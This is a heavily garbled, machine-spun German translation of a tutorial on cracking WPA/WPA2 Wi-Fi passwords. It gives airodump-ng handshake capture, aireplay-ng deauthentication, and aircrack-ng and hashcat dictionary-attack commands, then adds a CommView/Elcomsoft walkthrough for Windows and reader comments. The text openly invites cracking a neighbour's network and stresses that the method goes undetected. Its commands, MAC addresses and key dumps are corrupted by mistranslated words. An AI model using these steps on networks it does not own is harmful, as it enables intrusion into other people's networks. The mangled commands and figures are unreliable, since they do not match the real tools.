WLAN-Crackingcracken Sie WPA / WPA2-WLAN-Router mit Airódump-ng ánd /.Dies ist normalerweise ein kurzes Tutorial, das zeigt, wie Wi-Fi-Netzwerke, die normalerweise mit anfälligen Sicherheitskennwörtern garantiert werden, unterbrochen werden. Es ist definitiv nicht inklusive, aber es sollte genug Informationen für Sie sein, um den Schutz Ihres persönlichen Systems zu testen oder in einen in der Nähe zu knacken. Der unten beschriebene Streik ist völlig passiv (nur Zuhören, es wird überhaupt nichts von Ihrem PC ausgegeben) und es ist sicherlich unmöglich, dies zu identifizieren, da Sie das von Ihnen gespaltene Sicherheitskennwort nicht tatsächlich verwenden. Ein optionaler aktiver Deauthentication-Angriff kann am Ende verwendet werden, um das Aufklärungsverfahren zu beschleunigen, und kann bei der bezeichnet werden.Wenn Sie mit diesem Prozess vertraut sind, können Sie die Beschreibungen vernachlässigen und zu einer Checkliste der Anweisungen springen, die unter verwendet werden. Eine Reihe von Vorschlägen und alternativen Methoden finden Sie in der.
Und haben auch gnädig Übersetzungen in und aus der chinesischen Sprache angeboten, wenn Sie diese Versionen wählen.HAFTUNGSAUSSCHLUSS: Dieses Softwareprogramm / Tutorial ist sicherlich nur für akademische Zwecke gedacht. Es sollte nicht für illegale Übungen verwendet werden. Der Autor ist nicht wirklich verantwortlich für seine Verwendung. Zieh dich an und werde ein Schwanz. Erhalten StartedThis Tutorial geht davon aus, dass Sie:.
Haben einen allgemeinen Komfort mit der Befehlszeile. Betreiben eine Debian-baséd Linux-Distribution, im Idealfall (OSX-Kunden beobachten die ).
Eingerichtet haben. sudo apt-gét installieren áircrack-ng. Haben Sie eine Mobilfunkkarte, die unterstützt (finden Sie für eine Liste der unterstützten Geräte)Brechen ein Wi-Fi-Netzwerk Verfolgen ModeBegin von Position zellulären Schnittstellen, die Monitor-Modus unterstützen mit. Airodump-ng10Sie sollten eine ähnliche Ausgabe sehen wie unten. CH 13 Verstrichen: 52 t 2017-07-23 15:49BSSID PWR Baken #Daten, #/s CH MB ENC ClPHER AUTH ESSID14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.gäste14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e814:22:DB:1A: DB: 64-81 44 7 0 1 54 WPA2 CCMP 14:22: DB:1A: DB: 66-83 48 0 0 1 54 e. WPA2 CCMP PSK steveser RO9C:5C:8E: C9:AB:Chemisch0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme00:23:69: ANZEIGE: AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlins Großartig06:26: BB:75: ED:69 -84 232 0 0 1 54e.
WPA2 CCMP PSK HH278:71:9C:99 :67:40 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D29C: 34:26:9F:2E: Elisabeth8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast2EEA-EXTBC: EE: 7 B: 8 F: 48:28 -85 119 10 0 1 54e WPA2 CCMP PSK rootEC: 1A:59:36 :Werbung:Kalifornien -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dcaFür die Zwecke dieser Demo, wählen wir das Sicherheitspasswort meines Netzwerks zu knacken, ‚hackme‘. Merken Sie sich die von airódump-ng angezeigte Menge BSSID MAC tackle und approach ( CH), da wé beide für den folgenden Schritt benötigt. Fangen Sie einen 4-Methoden-HandshakeWPA / WPA2 verwendet a, um Geräte beim System zu authentifizieren. Sie müssen nichts darüber wissen, was das bedeutet, aber Sie müssen einen von Thése-Handshakes erfassen, um das Systempasswort zu knacken.
Diese Handshakes treten immer dann auf, wenn ein Gerät eine Verbindung zum System herstellt, z. B. wenn Ihre Nachbarn von der Arbeit nach Hause zurückkehren. Wir fangen diesen Handshake auf, indem wir airmon-ng dazu bringen, die Besucher auf dem Zielsystem anhand der Station und der BSSID-Informationen zu verfolgen, die aus dem vorherigen Befehlswort ermittelt wurden. # ersetzen -w und -bssid Werte mit den Werten des Zielsystems # -w gibt das Verzeichnis Website, wo wir die Box captureairodump-ng -c 3 -bssid 9C speichern:5C:8E:C9:AB:C0 -Watt. Mo0 CH 6 Verstrichen: 1 Minuten 2017-07-23 16:09 BSSID PWR RXQ Beacons #Daten, #/ s CH MB ENC ClPHER AUTH ESSlD9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK asusjetzt warten wir.
Sobald Sie einen Handshake erfasst haben, sollten Sie etwas entdecken Iike WPA handshaké: bc:d3:c9:éf:d2:67 am besten rechts auf dem Bildschirm, nur am besten der Gegenwart.Wenn Sie sich normalerweise ungeduldig fühlen und normalerweise einen energetischen Angriff ausführen möchten, können Sie Geräte, die mit dem Focus on-Netzwerk verbunden sind, mit Strom versorgen, um die Verbindung wiederherzustellen. Dies kommt normalerweise bei der Erfassung eines 4-Methoden-Handshakes zugute. Finden Sie die unten für Informationen über this.As sobald Sie einen Handschlag genommen haben, drücken Sie Strg-c, um airodump-ng aufzugeben. Sie sollten ein.cap-Dokument überall dort beobachten, wo Sie airodump-ng aufgefordert haben, die Erfassung zu speichern (wahrscheinlich -01.Kappe). Wir werden diese Capture-Datei verwenden, um das Systemkennwort zu knacken. Ich mag tó dieses Dokument umbenennen, um den Systemnamen zu offenbaren wir versuchen zu brechen.
Mv./-01.cap hackme.um das Netzwerkpasswort zu knackender letzte Schritt besteht definitiv darin, das Passwort mit dem Netzwerk-Handshake zu brechen. Wenn Sie Zugriff auf eine GPU haben, empfehle ich dringend, Hashcat zum Brechen von Sicherheitspasswörtern zu verwenden. Ich habe ein einfaches Tool erstellt, mit dem Hashcat super einfach zu bedienen ist. Wenn Sie keinen Zugang zu einer GPU haben, gibt es verschiedene Web-GPU-Cracking-Dienste, die Sie verwenden können, wie. Mit Aircrack-ng können Sie auch das Knacken von Prozessoren testen.Beachten Sie, dass beide folgenden Angriffsstrategien ein ziemlich schwaches, vom Benutzer generiertes Sicherheitskennwort voraussetzen.
Die meisten WPA / WPA2-Router verfügen über starke 12-stellige Zufallskennwörter, die mehrere Benutzer (zu Recht) nicht überprüft lassen. Wenn Sie normalerweise versuchen, eines dieser Passwörter zu knacken, empfehle ich die Verwendung der Wörterbuchdateien. Cracking mit naive-hashcat (empfohlen)Bevor wir das Sicherheitspasswort mit naive-hashcat teilen können, müssen wir unsere transformieren.cap-Dokument in das vergleichbare Hashcat-Dateiformat.hccapx. Sie können dies einfach tun, indem Sie entweder die hochladen.cover-Datei an oder mit dem Gerät gerade. # downloadgit duplicate naive-hashcat# Laden Sie die 134MC rockyou dictionary filecurl -M -o dicts / rockyou herunter.txt split! # 2500 ist die Hashcat-Hash-Einstellung fór WPA/WPA2HASHFILE=hackmé.hccapx POTFILE=hackmé.topf HASHTYP = 2500./naiv-hashcat.shNaive-hashcat verwendet verschiedene und (intelligente Brute-Force-) Angriffe und es kann Zeiten oder sogar Monate dauern, um gegen Passwörter mittlerer Stärke zu arbeiten. Das beschädigte Passwort wird an hackme weitergegeben.überprüfen Sie diese Datei daher regelmäßig.
Sobald Sie das Passwort beschädigt haben, sollten Sie so etwas wie den Inhalt Ihrer POTDATEI sehen: e30a5a57fc00211fc9fcc3: 9c5c8ec9abc0:acd1b8dfd971:ASUS:Hacktheplanetwo die letzten beiden Felder geteilt durch: sind der Netzwerkname und das Sicherheitskennwort.Wenn Sie Hashcat ohne naive-hashcat verwenden möchten, finden Sie weitere Informationen. Brechen mit Aircrack-ngAircráck-ng kann für wirklich einfache Wörterbuchangriffe verwendet werden, die auf Ihrer Zentraleinheit ausgeführt werden.
Bevor Sie den Streik ausführen, benötigen Sie eine Wortliste. Ich schlage vor, die berüchtigte Rockyou-Wörterbuchdatei zu verwenden.
# -a2 spezifiziert WPA2, -n ist definitiv die BSSID, -watts ist sicherlich das wortfileaircrack-ng -a2 -w 9C:5C:8E:C9:AB:C0 -w rockyou.in: txt hackme.capIf das Sicherheitspasswort geknackt wird, finden Sie eine wesentliche gefunden! Nachricht im Flughafenterminal von der Klartext-Version des Netzwerk-Passwort übernommen. Aircrack-ng 1.2 beta300:01:49 111040 keys examined (1017.96 k/s)KEY Found out! hacktheplanet Professional Essential: A1 90 16 62 6C B3 Age2 DB BB Deb1 79 CB 75 N2 Chemical7 8959 4A G9 04 67 10 66 M5 97 83 7B G3 De uma 6C 29 2ETransient Essential: CB 5A F8 CE 62 T2 1B Y7 6F 50 M0 25 62 E9 5D 712F 1A 26 34 DD 9F 61 N7 68 85 CC BC 0F 88 88 736F CB 3F CC 06 0C 06 08 ED DF EC 3C Deb3 42 5D 788D EC 0C EA Chemical2 BC 8A Age2 M7 M3 A2 7F 9F 1A Chemical3 21EAPOL HMAC: 9F M6 51 57 M3 FA 99 11 9D 17 12 BA C6 DB 06 M4Deauth AttackA deauth strike sendet gefälschte Deauthentifizierungspakete von Ihrem Gerät an einen Client, der mit dem System verbunden ist, das Sie normalerweise zu brechen versuchen.
Diese Pakete enthalten falsche Absenderadressen, die sie dem Client so erscheinen lassen, als wären sie selbst von der Gain Access to Stage gesendet worden. Nach Erhalt solcher Pakete trennen sich viele Clients vom Netzwerk und stellen sofort die Verbindung wieder her, sodass Sie einen 4-Wege-Handshake erhalten, wenn Sie normalerweise mit airodump-ng hören.Verwenden Sie airodump-ng, um einen bestimmten Zugangspunkt zu verfolgen (mit -chemical sales channel -bssid MAC), bis ein Kunde (Bahnhof) verknüpft ist.
Ein verbundener Client erscheint etwa so, wo sein kann 64:BC:0C:48:97:F7 der Kunde MAC. CH 6 Verstrichen: 2 Minuten 2017-07-23 19:15 BSSID PWR RXQ Beacons #Daten, # / s CH MB ENC ClPHER AUTH ESSlD9C: 5C: 8E: C9: AB: C0 – 144 10 6 54e WPA2 CCMP PSK ASUSBSSID Bahnhof PWR Preis Verlorene Frames Probe9C:5C: 8E: C9: AB: C0 64: BC: 0C: 48: 97:F7 -37 1e- 1e 4 6479 asusjetzt, verlassen airodump-ng Betrieb und öffnen Sie ein neues Flughafenterminal. Wir werden den Befehl aireplay-ng verwenden, um künstliche Deauth-Pakete an unseren Zielclient zu senden, eine Verbindung zum Netzwerk herzustellen und hoffentlich einen Handshake in der Prozedur zu erhalten. # platzieren Sie Ihr System-Gadget in Keep track of modeairmon-ng begin wlan0# Hören Sie auf alle Beacon-Strukturen in der Nähe, um sich auf BSSID und Channe zu konzentrierenirodump-ng mon0# Hören Sie auf den handshakeairodump-ng -chemical 6 -bssid 9C: 5C: 8E: C9: AB:C0 -w0/ wednesday0# optional deauth einen verknüpften Kunden, um einen handshakeairepIay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -d 64: BC:0C:48:97:F7 mon0########## geteiltes Sicherheitspasswort mit Aircrack-ng. ########## # herunterladen 134MN rockyou.txt-Wörterbuch-Dokument, falls erforderlichcurl -D -o rockyou.txt Riss w / aircrack-ngaircrack-ng -a2 -b 9C:5C:8E:C9:AB: C0 -w rockyou.txt-Erfassung/-01.kappe########## oder knacken Sie das Sicherheitspasswort mit naive-hashcat ########## # konvertieren Sie cap in hccapxcap2hccapx.mülleimer +/-01.capture/-01.hccapx# crack mit naiv-hashcatHASHFlLE=hackme.hccapx P0TFILE=hackme.behälter HASHTYPE=2500./naive-hashcat.sh Die Resonanz auf diesen Leitfaden war daher großartig, dass ich Empfehlungen und zusätzliches Material von Community-Benutzern als hinzugefügt habe. Probieren Sie es aus, um zu verstehen, wie es geht:. Erfassen Sie Handshakes und brechen Sie WPA-Passwörter unter macOS / OSX.
Knacken Sie Wpa mit Commview Wifi Windows 7
Fangen Sie mit wIandump-ng Handshakes von jedem System in yóu ein. Nutzen Sie meltdown, um 100+ GB Wortlisten on-thé-fly zu generieren. Spoof yóur MAC Deal mit mit macchangerA óf der Anhang kann auch zugänglich sein.
Attributionviele der hier präsentierten Informationen wurden entnommen. Vielen Dank auch an die tollen Autoren und Betreuer, die an Aircráck-ng und Háshcat arbeiten.Überwältigender Dank an und für die Übersetzung dieses Leitfadens in. Zusätzliche Shout-outs zu, und die auch Vorschläge und Tippfehler Behandlungen auf 3d GitHub zur Verfügung gestellt. Wenn yóu normalerweise neugierig sind, einige vorgeschlagene Optionen für WPA2 zu hören, lesen Sie einige der hervorragenden Diskussionen über Hacker News Post.
Wie Sie wissen, gibt es normalerweise viele Möglichkeiten, das WLAN-Passwort zu hacken. Und an einem von früheren Artikeln sprechen wir. Daher gibt es auch eine Methode für Windows-Benutzer.1. Sie müssen auch ánd a fter thát download herunterladen. Und beides am PC einrichten.2. Öffnen Sie CommView und klicken Sie auf die Option Start.
Klicken Sie auf die Fangauswahl, um den Fang zu starten. Es werden Ihnen alle zugänglichen AP angezeigt. Klicken sie auf auf die Werkzeuge Wählen Sie die Knoten Reassoication wahl (wenn Knoten Rassociation ist in der regel nicht funktioniert, dann machen verwendung von WiFi Alfa karte).3. Wählen Sie Ihren Fokus auf AP in thé Senden Sie eine déauthentication-Anforderung aus dieser AP-Option. Es zeigt Ihnen alle zugänglichen Client-Auswahl.Klicken Sie auf die Option Jetzt senden, um das Paket für die 4-Wege-Authentifizierung zu senden. Warten Sie einige Zeit – es wird die Box fangen.4. Klicken Sie auf die Auswahl speichern und wählen Sie Ihr Dokumentformat Commview Capture Files (.ncf).Fangprozess derzeit abgeschlossen!5.
Öffnen Sie jetzt Wireless Safety Auditor. Klicken Sie auf auf den Registerkarten Daten übertragen Wählen Sie das CommViewLog importieren choice.It zeigt Ihnen Details zu AP und Informationen zur Auswahl mehrerer Handshakes an. Klicken Sie auf OK.6.
Klicken Sie auf die Option Angriff beginnen und wählen Sie die Option Wörterbuchangriff. Die Auswahlmöglichkeiten Ihres anderen Angriffs sind jedoch weiterhin verfügbar.Innerhalb weniger Minuten wird Ihr Passwort ermittelt und das Sicherheitskennwort angezeigt.Heute Ihre abgeschlossen! Ich hoffe, Sie schätzen es. AnonymousOk.ich stelle fest, Mikael etwas elese besitzen auszuführen, so werde ich es testen, wenn u nicht mit Google suchen müssen:Diese Art von Angriff, wie in Aktion 3, wird sicherlich verwendet, wenn u einen WiFi-Adapter mit Schussenergie bekam.das bedeutet, dass es sich nicht wirklich um die WLAN-Karte des Laptops handelt, sondern um ein USB-WLAN anténna.So .
Wir besitzen keinen, der wie ein Angriff wirkt. Was machen wir? Wir beginnen wie in Aktion 4 zu speichern, wenn wir jedes 100.000-Paket erreichen, oder wir verwenden die Option zum automatischen Speichern in den Arbeitsregisterkarten. Ich empfehle die letzte Option, da Sie mindestens ein Nachtpaket benötigen, um 1 oder, wenn Sie ein wirklich glücklicher Mensch sind, 2 Handshakes zu erhalten.Das Commview 7 wird keine Capture-Taste haben, so dass Sie nur Angebote von einem Verkaufskanal oder von allen Kanälen speichern können.Und übrigens verstehe ich nicht, ob Elcomsoft Wireless Safety Auditor mit einem Wörterbuch geliefert wird. So können Sie aircrack-ng mit WPA-Listen von torents verwenden.Sórry für mein beschissenes Englisch. Viel Spaß beim Knacken :). AnonymousIn Zero2 Ihres Tutorials, Sie geben insbesondere an, dass die Knotenassoziation nicht funktioniert, dann nutzen Sie WiFi Alfa Credit Card’Und als Sie im September jemand befragt wurden, Sie haben ausdrücklich angegeben, dass Sie es kaufen müssen.
Sicher, dass Sie das Design nicht angeben, aber Sie sollten.Jedenfalls ist nicht alles verloren. Ich habe es geschafft, die Handshakes mit Live Kali Linux zu erfassen. Im Moment muss ich herausfinden, wie ich sie knacken und den Zugangscode erhalten kann.Bestimmte Elcomsoft Wireless Security Auditor wird helfen, aber es ist nicht so einfach, wie Sie hier erklären.
Sie benötigen eine hude Menge Wörterbücher und danach wieder ist es nicht wirklich garantiert, dass Sie erfolgreich sein werden.Ein guter Leitfaden sollte aus all diesen Informationen bestehen.